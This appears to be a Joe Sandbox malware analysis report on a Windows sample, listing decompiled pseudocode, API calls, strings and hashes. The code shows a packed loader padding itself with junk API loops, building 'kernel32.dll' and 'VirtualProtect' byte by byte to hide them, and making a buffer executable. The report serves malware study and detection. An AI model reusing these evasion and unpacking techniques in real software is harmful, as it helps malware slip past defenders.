                    				_t86 = E004032AB( *0x574b0c,  *0x57a190, 0x40f010);
                    				_t141 = 0;
                    				do {
                    					if( *0x57a190 == 0x10) {
                    						_t86 = InterlockedDecrement(0);
                    					}
                    					if(_t141 == 0x1e674) {
                    						_t86 = E0040339D(_t86);
                    					}
                    					_t141 = _t141 + 1;
                    				} while (_t141 < 0x3e4e2);
                    				E00402FF7();
                    				if( *0x57a190 == 0x1144) {
                    					GetModuleHandleW(L"tizep");
                    					FormatMessageA(0, 0, 0, 0,  &_v1416, 0, 0);
                    					__imp__CreateActCtxW( &_v100);
                    					_push(0);
                    					VerifyVersionInfoW( &_v392, 0, 0);
                    					InterlockedIncrement( &_v24);
                    					InterlockedIncrement( &(_v32.dwHighDateTime));
                    					GetCommandLineA();
                    					_v8 = 0;
                    					asm("stosw");
                    					_v12 = 0;
                    					asm("stosw");
                    					WriteConsoleOutputW(0,  &(_v20.dwHighDateTime), _v8, _v12,  &_v44);
                    					GetBinaryTypeA(0,  &_v36);
                    					GetCommandLineA();
                    				}
                    				if( *0x57a190 == 0x1d) {
                    					WriteConsoleW(0, 0, 0,  &_v36, 0);
                    					lstrcpynW( &_v5204, 0, 0);
                    					CopyFileA(0, 0, 0);
                    					LoadLibraryA(0);
                    					__imp__MoveFileWithProgressA(0, 0, 0, 0, 0);
                    					_v64.Internal = 0;
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					asm("stosd");
                    					PostQueuedCompletionStatus(0, 0, 0,  &_v64);
                    					GetCPInfo(0, 0);
                    					InterlockedDecrement( &_v24);
                    					GetPrivateProfileStructA(0, 0,  &_v1416, 0, 0);
                    					__imp__DeleteVolumeMountPointA(0);
                    					__imp__GetVolumeNameForVolumeMountPointA(0, 0, 0);
                    					__imp__GetConsoleAliasesLengthW(0);
                    					GetFileTime(0,  &_v20,  &_v32,  &_v44);
                    					GetStringTypeW(0, 0, 0, 0);
                    				}
                    				L00403397();
                    				return 0;
                    				L8:
                    				_t146 = _t146 + 1;
                    				if(_t146 < 0x91be26a3) {
                    					goto L1;
                    				}
                    				goto L9;
                    			}




































                    0x004034aa
                    0x004034b2
                    0x004034bc
                    0x00000000
                    0x004034be
                    0x004034c4
                    0x004034c8
                    0x004034cf
                    0x004034cf
                    0x004034dc
                    0x004034eb
                    0x004034eb
                    0x004034f7
                    0x00000000
                    0x00000000
                    0x00403514
                    0x00403514
                    0x00403516
                    0x0040351c
                    0x00403523
                    0x00403523
                    0x00403530
                    0x00403537
                    0x00403537
                    0x0040353d
                    0x0040353e
                    0x0040354d
                    0x00403553
                    0x00403559
                    0x0040355b
                    0x00403560
                    0x00403566
                    0x00403568
                    0x00403569
                    0x00403575
                    0x0040357d
                    0x00403598
                    0x004035a2
                    0x004035a2
                    0x004035a8
                    0x004035a9
                    0x004035a9
                    0x00403568
                    0x004035b7
                    0x004035be
                    0x004035c5
                    0x004035ce
                    0x004035d9
                    0x004035e0
                    0x004035fd
                    0x00403604
                    0x0040360c
                    0x00403619
                    0x00403622
                    0x00403629
                    0x00403632
                    0x00403644
                    0x00403655
                    0x0040365f
                    0x0040366e
                    0x00403671
                    0x00403671
                    0x00403673
                    0x00403673
                    0x00403673
                    0x0040367c
                    0x0040367f
                    0x00403684
                    0x0040368b
                    0x0040368e
                    0x0040368e
                    0x0040369b
                    0x004036a4
                    0x004036a4
                    0x004036a9
                    0x004036ac
                    0x004036bc
                    0x004036c8
                    0x004036cd
                    0x004036cf
                    0x004036d2
                    0x004036d4
                    0x004036d4
                    0x004036d9
                    0x004036da
                    0x004036f3
                    0x004036f8
                    0x004036fa
                    0x00403701
                    0x00403704
                    0x00403704
                    0x00403710
                    0x00403712
                    0x00403712
                    0x00403717
                    0x00403718
                    0x00403720
                    0x0040372f
                    0x0040373a
                    0x0040374d
                    0x00403757
                    0x0040375d
                    0x00403767
                    0x00403777
                    0x0040377d
                    0x0040377f
                    0x00403787
                    0x0040378e
                    0x00403790
                    0x00403797
                    0x004037a8
                    0x004037b3
                    0x004037b9
                    0x004037b9
                    0x004037c6
                    0x004037d4
                    0x004037e3
                    0x004037ec
                    0x004037f3
                    0x004037fe
                    0x00403806
                    0x0040380c
                    0x0040380d
                    0x0040380e
                    0x0040380f
                    0x00403817
                    0x0040381f
                    0x00403829
                    0x0040383a
                    0x0040383d
                    0x00403846
                    0x0040384d
                    0x00403860
                    0x0040386a
                    0x0040386a
                    0x00403870
                    0x0040387b
                    0x0040350b
                    0x0040350b
                    0x00403512
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • CharUpperBuffW.USER32(00000000,00000000), ref: 004034C8
                    • SetLastError.KERNEL32(00000000), ref: 004034CF
                    • WinHttpCreateUrl.WINHTTP(00000000,00000000,?,?), ref: 004034EB
                    • QueryMemoryResourceNotification.KERNEL32(00000000,?), ref: 00403537
                    • LocalAlloc.KERNELBASE(00000000), ref: 0040354D
                    • RegisterWaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040357D
                    • GetNamedPipeHandleStateW.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00403598
                    • InterlockedDecrement.KERNEL32(?), ref: 004035A2
                    • EnumDateFormatsA.KERNEL32(00000000,00000000,00000000), ref: 004035CE
                    • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004035D9
                    • DeleteFiber.KERNEL32(00000000), ref: 004035E0
                    • GetPrivateProfileStructA.KERNEL32 ref: 004035FD
                    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000), ref: 00403604
                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 0040360C
                    • RtlCaptureContext.KERNEL32(?), ref: 00403619
                    • FindResourceW.KERNEL32(00000000,00000000,00000000), ref: 00403622
                    • LocalSize.KERNEL32 ref: 00403629
                    • OpenMutexW.KERNEL32(00000000,00000000,00000000), ref: 00403632
                    • GetStringTypeExA.KERNEL32(00000000,00000000,Dopayenecavet,00000000,?), ref: 00403644
                    • GetComputerNameA.KERNEL32 ref: 00403655
                    • LeaveCriticalSection.KERNEL32(?), ref: 0040365F
                    • RegisterWaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,00000000,00000000), ref: 00403671
                    • LoadLibraryA.KERNEL32(00000000), ref: 0040368E
                    • GetModuleHandleA.KERNEL32(msimg32.dll), ref: 0040369E
                    • GetProcAddress.KERNEL32(msimg32.dll), ref: 004036C2
                    • InterlockedDecrement.KERNEL32(00000000), ref: 00403704
                    • GetModuleHandleW.KERNEL32(tizep), ref: 0040373A
                    • FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040374D
                    • CreateActCtxW.KERNEL32(?), ref: 00403757
                    • VerifyVersionInfoW.KERNEL32(?,00000000,00000000,00000000), ref: 00403767
                    • InterlockedIncrement.KERNEL32(?), ref: 00403777
                    • InterlockedIncrement.KERNEL32(?), ref: 0040377D
                    • GetCommandLineA.KERNEL32 ref: 0040377F
                    • WriteConsoleOutputW.KERNEL32(00000000,?,001756BB,?,?), ref: 004037A8
                    • GetBinaryTypeA.KERNEL32(00000000,?), ref: 004037B3
                    • GetCommandLineA.KERNEL32 ref: 004037B9
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004037D4
                    • lstrcpynW.KERNEL32(?,00000000,00000000), ref: 004037E3
                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 004037EC
                    • LoadLibraryA.KERNEL32(00000000), ref: 004037F3
                    • MoveFileWithProgressA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004037FE
                    • PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,?), ref: 00403817
                    • GetCPInfo.KERNEL32(00000000,00000000), ref: 0040381F
                    • InterlockedDecrement.KERNEL32(?), ref: 00403829
                    • GetPrivateProfileStructA.KERNEL32 ref: 0040383A
                    • DeleteVolumeMountPointA.KERNEL32 ref: 0040383D
                    • GetVolumeNameForVolumeMountPointA.KERNEL32(00000000,00000000,00000000), ref: 00403846
                    • GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 0040384D
                    • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00403860
                    • GetStringTypeW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040386A
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: Interlocked$ConsoleDecrementFileHandleTypeVolume$CommandCreateCriticalDeleteExchangeIncrementInfoLibraryLineLoadLocalModuleMountNameObjectPointPrivateProfileRegisterResourceSectionSingleStringStructWaitWrite$AddressAliasesAllocBinaryBuffCaptureCharCompletionComputerContextCopyCountDateEnumErrorFiberFindFormatFormatsHttpInitializeLastLeaveLengthMemoryMessageMoveMutexNamedNotificationOpenOutputPipePostProcProgressQueryQueuedSizeSpinStateStatusTimeUpperVerifyVersionWithlstrcpyn
                    • String ID: Dopayenecavet$gosizepeyabuxijavusadiculihazasa$msimg32.dll$mupexabetor$sijewenudapegiginotolut$tizep$NhvPhv
                    • API String ID: 1422112594-1817133863
                    • Opcode ID: 61620e7252f3a42bfd68b3c5f7988256414f4d1ce1b1f806e1bf8ae284955ebd
                    • Instruction ID: 233c2ec5048e7ba02c5e8a1465d959c430b2f9b943e3d2f1860d67d85045e0a7
                    • Opcode Fuzzy Hash: 61620e7252f3a42bfd68b3c5f7988256414f4d1ce1b1f806e1bf8ae284955ebd
                    • Instruction Fuzzy Hash: 19B1EDB2800148BFDB119BA0ED88DAF7B7CFB48345B404476F646F2561D7389E859B68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 72 610420-6104f8 74 6104fa 72->74 75 6104ff-61053c CreateWindowExA 72->75 76 6105aa-6105ad 74->76 77 610540-610558 PostMessageA 75->77 78 61053e 75->78 79 61055f-610563 77->79 78->76 79->76 80 610565-610579 79->80 80->76 82 61057b-610582 80->82 83 610584-610588 82->83 84 6105a8 82->84 83->84 85 61058a-610591 83->85 84->79 85->84 86 610593-610597 call 610110 85->86 88 61059c-6105a5 86->88 88->84
                    APIs
                    • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00610533
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425990913.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_610000_vwhdahh.jbxd
                    Similarity
                    • API ID: CreateWindow
                    • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                    • API String ID: 716092398-2341455598
                    • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction ID: b00e9dd92ace3d8796e76c8b58d756ef0b25384140c3b9a74b211d024042493a
                    • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                    • Instruction Fuzzy Hash: EF512970D08388DAEF11CBE8C949BDDBFB26F11708F284058D5446F296C3FA5699CB66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 89 4033a9-4034a8 LoadLibraryA VirtualProtect
                    C-Code - Quality: 100%
                    			E004033A9(void* __eax, void* __ecx) {
                    				long _v8;
                    				struct HINSTANCE__* _t4;
                    				int _t6;
                    				CHAR* _t10;
                    
                    				_t10 = "msimg32.dll";
                    				 *0x4205ce = 0x33;
                    				 *0x4205cf = 0x32;
                    				 *0x4205d3 = 0x6c;
                    				M004205CB = 0x6e;
                    				"msimg32.dll" = 0x6b;
                    				M004205CC = 0x65;
                    				"32.dll" = 0x6c;
                    				"simg32.dll" = 0x65;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x2e;
                    				 *0x4205d1 = 0x64;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205d4 = 0;
                    				_t4 = LoadLibraryA(_t10);
                    				 *0x57860c = _t4;
                    				 *0x4205d3 = 0x65;
                    				"simg32.dll" = 0x69;
                    				M004205CC = 0x75;
                    				 *0x4205ce = 0x6c;
                    				"32.dll" = 0x61;
                    				 *0x4205d1 = 0x6f;
                    				 *0x4205d5 = 0x74;
                    				"msimg32.dll" = 0x56;
                    				 *0x4205d4 = 0x63;
                    				 *0x4205cf = 0x50;
                    				 *0x4205d6 = 0;
                    				M004205CB = 0x74;
                    				 *0x4205d2 = 0x74;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x72;
                    				"`ghvmsimg32.dll" = GetProcAddress(_t4, _t10);
                    				_t6 = VirtualProtect( *0x574b0c,  *0x57a190, 0x40,  &_v8); // executed
                    				return _t6;
                    			}







                    0x004033b0
                    0x004033b6
                    0x004033bd
                    0x004033c4
                    0x004033cb
                    0x004033d2
                    0x004033d9
                    0x004033e0
                    0x004033e7
                    0x004033ee
                    0x004033f5
                    0x004033fc
                    0x00403403
                    0x0040340a
                    0x00403411
                    0x00403419
                    0x0040341e
                    0x00403425
                    0x0040342c
                    0x00403433
                    0x0040343a
                    0x00403441
                    0x00403448
                    0x0040344f
                    0x00403456
                    0x0040345d
                    0x00403464
                    0x0040346b
                    0x00403472
                    0x00403479
                    0x00403480
                    0x00403499
                    0x004034a4
                    0x004034a8

                    APIs
                    • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00403411
                    • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403487
                    • VirtualProtect.KERNELBASE(00000040,?), ref: 004034A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProcProtectVirtual
                    • String ID: msimg32.dll$NhvPhv
                    • API String ID: 3509694964-2647807948
                    • Opcode ID: e840132f2f56fdc199d5d7430dc8ee0da973de19c2dc364205b69c030a012b5b
                    • Instruction ID: 74fd791a24f9d11ace7b6cd8026ad375d7b5e4068001da387876ea6cbc3f6525
                    • Opcode Fuzzy Hash: e840132f2f56fdc199d5d7430dc8ee0da973de19c2dc364205b69c030a012b5b
                    • Instruction Fuzzy Hash: DE2166106092C0FDE722C728AD487523FD56B22749F8800A9D1849A2B3C7FA11DADF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 92 4033ab-4034a8 LoadLibraryA VirtualProtect
                    C-Code - Quality: 100%
                    			E004033AB(void* __ecx) {
                    				long _v8;
                    				struct HINSTANCE__* _t2;
                    				int _t4;
                    				CHAR* _t8;
                    
                    				_t8 = "msimg32.dll";
                    				 *0x4205ce = 0x33;
                    				 *0x4205cf = 0x32;
                    				 *0x4205d3 = 0x6c;
                    				M004205CB = 0x6e;
                    				"msimg32.dll" = 0x6b;
                    				M004205CC = 0x65;
                    				"32.dll" = 0x6c;
                    				"simg32.dll" = 0x65;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x2e;
                    				 *0x4205d1 = 0x64;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205d4 = 0;
                    				_t2 = LoadLibraryA(_t8);
                    				 *0x57860c = _t2;
                    				 *0x4205d3 = 0x65;
                    				"simg32.dll" = 0x69;
                    				M004205CC = 0x75;
                    				 *0x4205ce = 0x6c;
                    				"32.dll" = 0x61;
                    				 *0x4205d1 = 0x6f;
                    				 *0x4205d5 = 0x74;
                    				"msimg32.dll" = 0x56;
                    				 *0x4205d4 = 0x63;
                    				 *0x4205cf = 0x50;
                    				 *0x4205d6 = 0;
                    				M004205CB = 0x74;
                    				 *0x4205d2 = 0x74;
                    				M004205CA = 0x72;
                    				 *0x4205d0 = 0x72;
                    				"`ghvmsimg32.dll" = GetProcAddress(_t2, _t8);
                    				_t4 = VirtualProtect( *0x574b0c,  *0x57a190, 0x40,  &_v8); // executed
                    				return _t4;
                    			}







                    0x004033b0
                    0x004033b6
                    0x004033bd
                    0x004033c4
                    0x004033cb
                    0x004033d2
                    0x004033d9
                    0x004033e0
                    0x004033e7
                    0x004033ee
                    0x004033f5
                    0x004033fc
                    0x00403403
                    0x0040340a
                    0x00403411
                    0x00403419
                    0x0040341e
                    0x00403425
                    0x0040342c
                    0x00403433
                    0x0040343a
                    0x00403441
                    0x00403448
                    0x0040344f
                    0x00403456
                    0x0040345d
                    0x00403464
                    0x0040346b
                    0x00403472
                    0x00403479
                    0x00403480
                    0x00403499
                    0x004034a4
                    0x004034a8

                    APIs
                    • LoadLibraryA.KERNEL32(msimg32.dll), ref: 00403411
                    • GetProcAddress.KERNEL32(00000000,msimg32.dll), ref: 00403487
                    • VirtualProtect.KERNELBASE(00000040,?), ref: 004034A4
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: AddressLibraryLoadProcProtectVirtual
                    • String ID: msimg32.dll$NhvPhv
                    • API String ID: 3509694964-2647807948
                    • Opcode ID: 64161e06727999188c498412df7b596d9faeac2c10d97adf832841b133585d92
                    • Instruction ID: d1576c4a165af817aa8c7486d1d3c4258ab4b3a0ec6bb34203ef70a554402430
                    • Opcode Fuzzy Hash: 64161e06727999188c498412df7b596d9faeac2c10d97adf832841b133585d92
                    • Instruction Fuzzy Hash: D42166106092C0FDE722C728AD087123ED56B22749F8800A9D1849A2B3C7FA11DADF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 94 40387c-40388d 95 4038bd-4038c7 94->95 96 40388f-4038ae call 404a17 call 4049e4 call 4040cd 94->96 98 4038c9-4038d0 95->98 111 4038b0-4038b2 SetConsoleMode 96->111 112 4038b8 call 40494f 96->112 100 4038d2-4038f4 SetFilePointer HeapWalk GetMailslotInfo GetProcessPriorityBoost 98->100 101 4038fa-403900 98->101 100->101 103 403902-403907 101->103 104 40390c-403913 101->104 103->104 104->98 105 403915 call 4034aa 104->105 109 40391a-40391f 105->109 111->112 112->95
                    C-Code - Quality: 100%
                    			E0040387C() {
                    				long _v8;
                    				char _v32;
                    				void* __ebp;
                    				intOrPtr _t3;
                    				void* _t18;
                    
                    				_t22 =  *0x57a190 - 3;
                    				if( *0x57a190 == 3) {
                    					E00404A17(0);
                    					E004049E4(0, 0);
                    					_t17 =  &_v32;
                    					E004040CD( &_v32, _t22);
                    					if( *0x57a190 == 0x22) {
                    						SetConsoleMode(0, 0);
                    					}
                    					E0040494F();
                    				}
                    				_t3 =  *0x4105a4; // 0xb9c2
                    				 *0x57a190 = _t3;
                    				_t18 = 0;
                    				do {
                    					if( *0x57a190 == 0x15) {
                    						SetFilePointer(0, 0,  &_v8, 0);
                    						HeapWalk(0, 0);
                    						GetMailslotInfo(0, 0, 0, 0, 0);
                    						GetProcessPriorityBoost(0, 0);
                    					}
                    					if(_t18 == 0x1737) {
                    						 *0x57a194 =  *0x40f008;
                    					}
                    					_t18 = _t18 + 1;
                    				} while (_t18 < 0x79a863);
                    				E004034AA(_t17); // executed
                    				return 0;
                    			}








                    0x00403885
                    0x0040388d
                    0x00403890
                    0x00403897
                    0x0040389f
                    0x004038a2
                    0x004038ae
                    0x004038b2
                    0x004038b2
                    0x004038b8
                    0x004038b8
                    0x004038bd
                    0x004038c2
                    0x004038c7
                    0x004038c9
                    0x004038d0
                    0x004038d9
                    0x004038e1
                    0x004038ec
                    0x004038f4
                    0x004038f4
                    0x00403900
                    0x00403907
                    0x00403907
                    0x0040390c
                    0x0040390d
                    0x00403915
                    0x0040391f

                    APIs
                    • SetConsoleMode.KERNEL32(00000000,00000000), ref: 004038B2
                    • SetFilePointer.KERNEL32(00000000,00000000,?,00000000), ref: 004038D9
                    • HeapWalk.KERNEL32(00000000,00000000), ref: 004038E1
                    • GetMailslotInfo.KERNEL32 ref: 004038EC
                    • GetProcessPriorityBoost.KERNEL32(00000000,00000000), ref: 004038F4
                      • Part of subcall function 00404A17: DeleteFileA.KERNEL32(?,?,00403895,00000000), ref: 00404A1F
                      • Part of subcall function 00404A17: GetLastError.KERNEL32(?,00403895,00000000), ref: 00404A29
                      • Part of subcall function 00404A17: __dosmaperr.LIBCMT ref: 00404A38
                      • Part of subcall function 004049E4: MoveFileA.KERNEL32 ref: 004049EF
                      • Part of subcall function 004049E4: GetLastError.KERNEL32(?,0040389C,00000000,00000000,00000000), ref: 004049F9
                      • Part of subcall function 004049E4: __dosmaperr.LIBCMT ref: 00404A08
                      • Part of subcall function 004040CD: __EH_prolog.LIBCMT ref: 004040D2
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: File$ErrorLast__dosmaperr$BoostConsoleDeleteH_prologHeapInfoMailslotModeMovePointerPriorityProcessWalk
                    • String ID:
                    • API String ID: 3148135725-0
                    • Opcode ID: 6dcbad6e7ced8ac36e6e022139d35636d820cc8c03cfcba4c7b5cbf26eff43f6
                    • Instruction ID: 04d5e15dd3d9b2bb7f4cc4c6b014d932c798737e1a238aae43ef0ed5359413fc
                    • Opcode Fuzzy Hash: 6dcbad6e7ced8ac36e6e022139d35636d820cc8c03cfcba4c7b5cbf26eff43f6
                    • Instruction Fuzzy Hash: 4C016572401550AAD312BF61FD0AC9F3F6CEF92315B00413AF549B1561D7380685EAAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 114 6105b0-6105d5 115 6105dc-6105e0 114->115 116 6105e2-6105f5 GetFileAttributesA 115->116 117 61061e-610621 115->117 118 610613-61061c 116->118 119 6105f7-6105fe 116->119 118->115 119->118 120 610600-61060b call 610420 119->120 122 610610 120->122 122->118
                    APIs
                    • GetFileAttributesA.KERNELBASE(apfHQ), ref: 006105EC
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425990913.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_610000_vwhdahh.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID: apfHQ$o
                    • API String ID: 3188754299-2999369273
                    • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction ID: 47e933c89610bcd377b7f4263f842fd2139587ecccdfdf0190064d2a180cf440
                    • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                    • Instruction Fuzzy Hash: 78011270C0424CEADF10DB94C5583EDBFB69F41308F188099D4052B341D7B69BD9CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 123 402ff7-403056 LoadLibraryA
                    C-Code - Quality: 100%
                    			E00402FF7() {
                    				struct HINSTANCE__* _t1;
                    
                    				"msimg32.dll" = 0x6d;
                    				"simg32.dll" = 0x73;
                    				"32.dll" = 0x33;
                    				 *0x4205d3 = 0;
                    				M004205CC = 0x67;
                    				 *0x4205d0 = 0x64;
                    				M004205CB = 0x6d;
                    				 *0x4205d1 = 0x6c;
                    				 *0x4205cf = 0x2e;
                    				 *0x4205d2 = 0x6c;
                    				 *0x4205ce = 0x32;
                    				M004205CA = 0x69; // executed
                    				_t1 = LoadLibraryA("msimg32.dll"); // executed
                    				return _t1;
                    			}




                    0x00402ffc
                    0x00403003
                    0x0040300a
                    0x00403011
                    0x00403018
                    0x0040301f
                    0x00403026
                    0x0040302d
                    0x00403034
                    0x0040303b
                    0x00403042
                    0x00403049
                    0x00403050
                    0x00403056

                    APIs
                    • LoadLibraryA.KERNELBASE(msimg32.dll,00403725), ref: 00403050
                    Strings
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425864440.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425925673.000000000057A000.00000004.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425938963.000000000057B000.00000002.00000001.01000000.00000006.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_400000_vwhdahh.jbxd
                    Similarity
                    • API ID: LibraryLoad
                    • String ID: msimg32.dll
                    • API String ID: 1029625771-3287713914
                    • Opcode ID: 1e62f176a67440fca8e3326165de175ac583bfac569920d5ff573f4913e73816
                    • Instruction ID: c3ca48617d25acd17f977b8f17b6631fcbeda749841bf92432e9428ad5d66121
                    • Opcode Fuzzy Hash: 1e62f176a67440fca8e3326165de175ac583bfac569920d5ff573f4913e73816
                    • Instruction Fuzzy Hash: 10F0C81074D2C0E9E762C328A95C7113ED52B22748FD844AAD1805A6A7C6FB01EACF7E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 124 407eb2-407ed4 HeapCreate 125 407ed6-407ed7 124->125 126 407ed8-407ee1 124->126
                    C-Code - Quality: 100%
                    			E00407EB2(intOrPtr _a4) {
                    				void* _t6;
                    
                    				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                    				 *0x57a634 = _t6;
                    				if(_t6 != 0) {
                    					 *0x57ac58 = 1;
                    					return 1;
                    				} else {
                    					return _t6;
                    				}
                    			}




                    0x00407ec7
                    0x00407ecd
                    0x00407ed4
                    0x00407edb
                    0x00407ee1
                    0x00407ed7
                    0x00407ed7
                    0x00407ed7

                    APIs
                    • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407EC7
                    Memory Dump Source
                    • Source File: 00000005.00000002.425781687.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000005.00000002.425767411.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425833140.000000000040D000.00000020.00000001.01000000.00000006.sdmpDownload File
                    • Associated: 00000005.00000002.425845663.0000000000410000.00000008.00000001.01000000.00000006.sdmpDownload File
